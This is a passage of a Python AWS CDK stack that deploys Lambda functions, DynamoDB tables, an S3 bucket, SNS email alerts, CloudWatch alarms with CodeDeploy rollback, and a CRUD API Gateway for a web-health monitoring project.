self.lambda_role() # Saving roles for lambda in iam_role\n \n \n dynamo_db = self.create_table(\"mubariz_table\",\"Timestamp\",\"Subject\") \n db_create_lambda = self.create_lambda('dynamo_lambda', './resources', 'dynamo_lambda.db_lambda_handler',role)\n db_create_lambda.apply_removal_policy(RemovalPolicy.DESTROY)\n \n #granting our dynamodblambda full access to our resources. \n dynamo_db.grant_full_access(db_create_lambda)\n\n \n #creating the lambda function for measuring our web health, and passing it the role to access our resources.\n WebHealthLambda = self.create_lambda('webHealthLambda', './resources', 'webHealthLambda.lambda_handler',role)\n WebHealthLambda.apply_removal_policy(RemovalPolicy.DESTROY)\n \n #creating parameters for rule to run, it binds our lambda function with the schedule for periodic invocation.\n #defining the schedule for our lambda function\n lambda_schedule = events_.Schedule.rate(Duration.minutes(1))\n lambda_target = targets_.LambdaFunction(WebHealthLambda) #creating the target for the lambda function.\n \n \n '''\n write parameters for rule function.\n \n '''\n \n rule = events_.Rule(self, \"webHealthInvocation\", \n description=\"Periodic Lambda\", \n schedule = lambda_schedule,\n enabled = True,\n targets = [lambda_target])\n\n \n #defining our s3 bucket.\n \n mak_bucket = s3.Bucket(self, \"mubariz-skipq-bucket-id\",\n # bucket_name = 'mubariz-s3-bucket',\n removal_policy = RemovalPolicy.DESTROY,\n auto_delete_objects = True, \n public_read_access=True)\n \n # SkipQVoyager\n #initializing s3 bucket with file having web urls\n s3deploy.BucketDeployment(self, \"voyager_skipq\", sources = [s3deploy.Source.asset('./s3_resources', exclude = ['**', '!s3_res.py'])],\n destination_bucket = mak_bucket)\n \n \n \n #extracting names of \n bucketName = mak_bucket.bucket_name\n tableName = dynamo_db.table_name\n # Adding Environment Variables\n WebHealthLambda.add_environment('bucketName', bucketName)\n db_create_lambda.add_environment('tableName', tableName)\n \n # creating an sns topic and then adding an email subscription to the sns topic\n \n # alarm is being binded by topic, which triggers email subscription and dblambdahandler \n \n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_sns.html\n my_topic = sns_.Topic(self, \"makTopic\")\n my_topicARN = my_topic.topic_arn #we will send this topic as envVAr to WHL as action in the alarm\n \n my_topic.add_subscription(\n sns_subs_.EmailSubscription(\"mubariz.khan.skipq@gmail.com\"))\n \n my_topic.add_subscription(\n sns_subs_.LambdaSubscription(db_create_lambda))\n \n \n for iterant in s3_res.URL_TO_MONITOR: \n \n ''' \n The dimensions for the metric.\n\n (dict) --\n\n A dimension is a name/value pair that is part of the identity of a metric.\n You can assign up to 10 dimensions to a metric. Because dimensions are part of the unique identifier for a metric,\n whenever you add a unique name/value pair to one of your metrics, you are creating a new variation of that metric.\n\n Name (string) --\n\n The name of the dimension. Dimension names must contain only ASCII characters \n and must include at least one non-whitespace character.\n\n Value (string) --\n\n The value of the dimension. Dimension values must contain only ASCII characters \n and must include at least one non-whitespace character.\n '''\n \n dimension = {'URL': iterant} \n \n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CREATING OUR METRICS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n\n # creating metrics using cloudwatch.metric to access urls{to monitor}, namespace\n # avail_metric = cloudwatch.Metric(namespace=s3_res.URL_NAMESPACE, \n # metric_name =s3_res.URL_AVAIL_NAMESPACE, \n # dimensions_map = dimension,\n # period=Duration.minutes(1))\n \n \n \n \n \n # lat_metric = cloudwatch.Metric(namespace=s3_res.URL_NAMESPACE,\n # metric_name =s3_res.URL_LAT_NAMESPACE,\n # dimensions_map = dimension,\n # period=Duration.minutes(1))\n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CREATING OUR ALARMS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n # lat_alarm = cloudwatch.Alarm(self, \n # id='latency_alarm'+'_'+iterant, \n # metric=lat_metric, \n # threshold = s3_res.THRESHOLD_2,\n # evaluation_periods = 1,\n # comparison_operator=cloudwatch.ComparisonOperator.GREATER_THAN_THRESHOLD\n # )\n \n # avail_alarm = cloudwatch.Alarm(self,\n # id='avail_alarm'+'_'+iterant, \n # metric=avail_metric, \n # threshold = s3_res.THRESHOLD_1,\n # evaluation_periods = 1,\n # comparison_operator=cloudwatch.ComparisonOperator.LESS_THAN_THRESHOLD\n # )\n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Binding OUR ALARMS w/ Topics %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_cloudwatch_actions/SnsAction.html\n # lat_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n # avail_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n \n \n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_dynamodb.html\n \n \n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_sns_subscriptions.html -> \n # {down}\n # https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_sns_subscriptions/LambdaSubscription.html\n \n # create table here in stack as it is a resource\n # time_atm will be our primary key\n\n #we'll suscribe the lambda to this topic\n \n #memory and durations k alarms likhnay hain \n \n ''' \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% creating our failure dimensions %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n #Failure dimensions for web health lambda\n \n WHL_failure_dimensions = {'FunctionName' : WebHealthLambda.function_name}\n WHL_failure_invo_dimensions = {'FunctionName' : WebHealthLambda.function_name}\n\n\n #Failure dimensions for dynamo lambda \n dynamo_failureDimensions = {'FunctionName' : db_create_lambda.function_name}\n dynamo_failure_invoDimensions = {'FunctionName' : db_create_lambda.function_name}\n \n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% creating metrics of lambda duration & invocation %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% by call metric.invocations & metric.duration which %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% return a metric regarding invocation or duration on %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% basis of the function call. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n invo_dynamo_metric = db_create_lambda.metric_invocations(\n dimensions_map = dynamo_failure_invoDimensions,\n period=Duration.minutes(5))\n \n dur_dynamo_metric = db_create_lambda.metric_duration(\n dimensions_map = dynamo_failureDimensions,\n period=Duration.minutes(5))\n \n invo_whl_metric = WebHealthLambda.metric_invocations(\n dimensions_map = WHL_failure_invo_dimensions,\n period=Duration.minutes(5))\n \n dur_whl_metric = WebHealthLambda.metric_duration(\n dimensions_map = WHL_failure_dimensions,\n period=Duration.minutes(5))\n \n \n # Duration & Invocation ALarms for Web Health Metric \n \n failure_alarm = cloudwatch.Alarm(self, \n id='WHLfirst_failure_alarm_duration', \n metric=dur_whl_metric, \n evaluation_periods = 1,\n threshold = 10000,#Duration.millis(2000),\n #If latency's spikes to a certain value, note that value and apply an alarm on based of that value\n comparison_operator = cloudwatch.ComparisonOperator.GREATER_THAN_THRESHOLD #\n )\n \n \n failure_invo_alarm =cloudwatch.Alarm(self, \n id='WHLfirst_failure_alarm_invo', \n metric=invo_whl_metric, \n evaluation_periods = 1,\n threshold = 1100,#Duration.millis(2000),\n #If latency's spikes to a certain value, note that value and apply an alarm on based of that value\n comparison_operator = cloudwatch.ComparisonOperator.LESS_THAN_THRESHOLD \n \n )\n \n \n #Duration & Invocation Alarms for Dyanmo Lambda \n \n \n Dynamofailure_invo_alarm = cloudwatch.Alarm(self, \n id='Dynamo_failure_alarm_invo', \n metric=invo_dynamo_metric, \n evaluation_periods = 1,\n threshold = 1000,#Duration.millis(2000),\n comparison_operator = cloudwatch.ComparisonOperator.LESS_THAN_THRESHOLD #If latency's spikes to a certain value, note that value and apply an alarm on based of that value\n \n )\n # Dynamofailure_invo_alarm \n Dynamofailure_duration_alarm = cloudwatch.Alarm(self, \n id='Dynamo_failure_alarm_dur', \n metric=dur_dynamo_metric, \n evaluation_periods = 1,\n threshold = 10000,#Duration.millis(2000),\n comparison_operator = cloudwatch.ComparisonOperator.GREATER_THAN_THRESHOLD #If latency's spikes to a certain value, note that value and apply an alarm on based of that value\n \n )\n \n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% creating Alias for Rollback %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n # alias (Alias) – Lambda Alias to shift traffic. \n #Updating the version of the alias will trigger a CodeDeploy deployment.\n # [disable-awslint:ref-via-interface] since we need to modify the alias CFN resource update policy\n \n \n whl_alias = lambda_.Alias(self, \"makLambdaAlias1\",\n alias_name=\"makcurrent_whl1\",\n version= WebHealthLambda.current_version #Returns a lambda.Version which represents the current version of this Lambda function. A new version will be created every time the function’s configuration changes.\n )\n \n dynamo_alias = lambda_.Alias(self, \"makDynamoLambdaAlias1\",\n alias_name=\"makcurrent_dynamo1\",\n version= db_create_lambda.current_version #Returns a lambda.Version which represents the current version of this Lambda function. A new version will be created every time the function’s configuration changes.\n )\n \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Deployment Group %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n codedeploy.LambdaDeploymentGroup(self, \"whl_mak_id1\",\n alias=whl_alias,\n deployment_config=codedeploy.LambdaDeploymentConfig.LINEAR_10_PERCENT_EVERY_1_MINUTE,\n alarms=[failure_alarm, failure_invo_alarm\n ]\n )\n \n \n codedeploy.LambdaDeploymentGroup(self, \"dynamofailure_mak_id1\",\n alias=dynamo_alias,\n deployment_config=codedeploy.LambdaDeploymentConfig.LINEAR_10_PERCENT_EVERY_1_MINUTE,\n alarms=[Dynamofailure_invo_alarm,Dynamofailure_duration_alarm \n\n ]\n )\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Binding Failure Alarms with %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Simple Notification Service %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% To Genrate Emails %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n #Binding Failure Alarms with SNS\n \n Dynamofailure_invo_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n Dynamofailure_duration_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n failure_alarm.add_alarm_action(cw_actions.SnsAction(my_topic))\n failure_invo_alarm.add_alarm_action(cw_actions.SnsAction(my_topic)) \n \n ''' \n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Definining API %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n # %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n \n \n # Creating a table which'll shift data from s3 bucket to table and then we'll perform CRUD \n # operations on that table based the API\n #create lambda to shift data from bucket to DB?\n \n bucket_to_db = self.create_dbtable(\"mak_bucket_to_table\",'url') \n bktToDBHandler = self.create_lambda('makBucketToDB', './resources', 'BucketToDB.bucket_to_dbHandler',role)\n bktToDBHandler.apply_removal_policy(RemovalPolicy.DESTROY)\n bucket_to_db.grant_full_access(bktToDBHandler)\n \n bktToDBHandler.add_environment('bucketName', bucketName)\n bktToDBHandler.add_environment('bktTotable', bucket_to_db.table_name)\n WebHealthLambda.add_environment('bktTotable', bucket_to_db.table_name)\n WebHealthLambda.add_environment('topic_arn', my_topicARN)\n \n #define api with endpoint as lambda and then invoke table in that lambda \n # perform CRUD operation according to request sent to API\n #define resources in stack but when will each operation occur,\n #like what will be the user that'll be interacting with the API to tell it \n # to perform Create, Read, Update, Delete?\n\n \n #dynamo lambda for writing alarm logs to table\n \n ApiHandler = self.create_lambda(\"ApiHandler\", \"./resources\", \"apiHandler.api_Handler\", role)\n ApiHandler.add_environment('bucketName', bucketName)\n ApiHandler.add_environment('bktTotable', bucket_to_db.table_name)\n bucket_to_db.grant_full_access(ApiHandler)\n \n \n # mak_api.\n # instantiating API Gateway\n apirole = self.api_lambda_role()\n self.create_makapi('mak-CrudApi', ApiHandler)#, True, apirole)\n \n dblambda_schedule = events_.Schedule.rate(Duration.minutes(1))\n dblambda_target = targets_.LambdaFunction(bktToDBHandler) #creating the target for the lambda function.\n \n \n '''\n write parameters for rule function.\n \n '''\n \n rule = events_.Rule(self, \"DBLambdaInvocation\", \n description=\"Periodic DB Lambda\", \n schedule = dblambda_schedule,\n enabled = True,\n targets = [dblambda_target])\n\n \n \n\n \n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n##%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% USER DEFINED HELPER FUNCTIONS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n\n\n '''\n api = defined here\n items = api.root.add_resource(\"items\")\n items.add_method(\"GET\")\n \n \n [*]--------api\n The rest API that this resource is part of.\n The reason we need the RestApi object itself and not just the ID is because the model is being tracked\n by the top-level RestApi object for the purpose of calculating it’s hash to determine the ID of the deployment.\n This allows us to automatically update the deployment when the model of the REST API changes.\n RETURNS IAPI\n \n api.root.addMethod(‘ANY’, redirectToHomePage); \n Type:Represents the root resource (“/”) of this API. Use it to define the API model\n // “ANY /” api.root.addResource(‘friends’).addMethod(‘GET’, getFriendsHandler); // “GET /friends”\n \n add_resource(path_part, *, default_cors_preflight_options=None, default_integration=None, default_method_options=None)\n \n '''\n \n def create_makapi(self,id_=None, handler_=None):#,cloud_watch_role=True,role=None):\n\n\n # creating a lambda-backed API Gateway\n api = gateway.LambdaRestApi(self, \n id = id_, \n handler=handler_,\n cloud_watch_role=True\n )\n \n '''\n allow_origins (Sequence[str]) – Specifies the list of origins that are allowed to make requests to this resource. \n If you wish to allow all origins, specify Cors.ALL_ORIGINS or [ * ].\n Responses will include the Access-Control-Allow-Origin response header. \n If Cors.ALL_ORIGINS is specified, the Vary: Origin response header will also be included.\n '''\n\n # adding resource and methods for it\n health = api.root.add_resource(\"health\")\n # health.add_cors_preflight(\n # allow_origins=['*'],\n # allow_methods=[\"ANY\"])\n \n \n health.add_method(\"GET\", gateway.LambdaIntegration(handler_)) # GET /items\n\n # adding resource and methods for it\n url = api.root.add_resource(\"url\")\n # url.add_method(\"GET\", gateway.LambdaIntegration(handler_))\n # url.add_cors_preflight(\n # allow_origins=['*'],\n # allow_methods=[\"ANY\"])\n\n url.add_method(\"GET\", gateway.LambdaIntegration(handler_))#,credentials_role=role)) # GET /url\n url.add_method(\"PUT\", gateway.LambdaIntegration(handler_))#,credentials_role=role)) # POST /url\n url.add_method(\"PATCH\", gateway.LambdaIntegration(handler_))#,credentials_role=role)) # UPDATE /url\n url.add_method(\"DELETE\", gateway.LambdaIntegration(handler_))#,credentials_role=role)) # DELETE /url\n \n return api\n \n \n \n def create_lambda(self, id_, asset, handler,role):\n return lambda_.Function(self, id_, \n runtime = lambda_.Runtime.PYTHON_3_6,\n handler = handler,\n timeout= Duration.minutes(1),\n code = lambda_.Code.from_asset(asset),\n role = role\n )\n \n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n ##%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \n \n \n \n def create_lambda_role(self, policyName):\n '''\n Link To Docs: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam.html\n https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam/ManagedPolicy.html\n \n AWS Identity and Access Management Construct Library:\n Define a role and add permissions to it. This will automatically create and attach an IAM policy to the role:\n \n Class: ManagedPolicy:\n -example: my_role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AWSLambdaBasicExecutionRole\"))\n \n classmethod from_aws_managed_policy_name(managed_policy_name)\n Import a managed policy from one of the policies that AWS manages.\n For this managed policy, you only need to know the name to be able to use it.\n Some managed policy names start with “service-role/”, some start with “job-function/”,\n and some don’t start with anything. Include the prefix when constructing this object.\n \n '''\n lambda_role = iam_.Role(self, \"Role\",\n assumed_by=iam_.ServicePrincipal(\"lambda.amazonaws.com\"),\n description = \"example role\")\n \n lambda_role.add_managed_policy(iam_.ManagedPolicy.from_aws_managed_policy_name(policyName))\n \n return lambda_role\n \n \n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n def create_table(self, id, partition_key=None, sort_key=None):\n '''\n Link: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_dynamodb/Attribute.html\n aws_cdk.aws_dynamodb.Table Provides a DynamoDB table.\n Parameters\n scope (Construct) –\n id (str) – \n partition_key (Attribute) – Partition key attribute definition.\n sort_key (Optional[Attribute]) – Sort key attribute definition. Default: no sort key\n Attribute-> Represents an attribute for describing the key schema for the table and indexes.\n '''\n dynamo_table = dynamodb.Table(self, id,\n # table_name=tableName,\n partition_key= dynamodb.Attribute(name=partition_key, type=dynamodb.AttributeType.STRING),\n sort_key= dynamodb.Attribute(name=sort_key, type=dynamodb.AttributeType.STRING),\n removal_policy=RemovalPolicy.RETAIN)\n return dynamo_table\n \n \n \n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n def lambda_role(self, id=None, assumed_by=None, managed_policies=None): # creating a function for defining a lambda role\n '''\n Link To Docs: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam.html\n https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam/ManagedPolicy.html\n \n AWS Identity and Access Management Construct Library:\n Define a role and add permissions to it. This will automatically create and attach an IAM policy 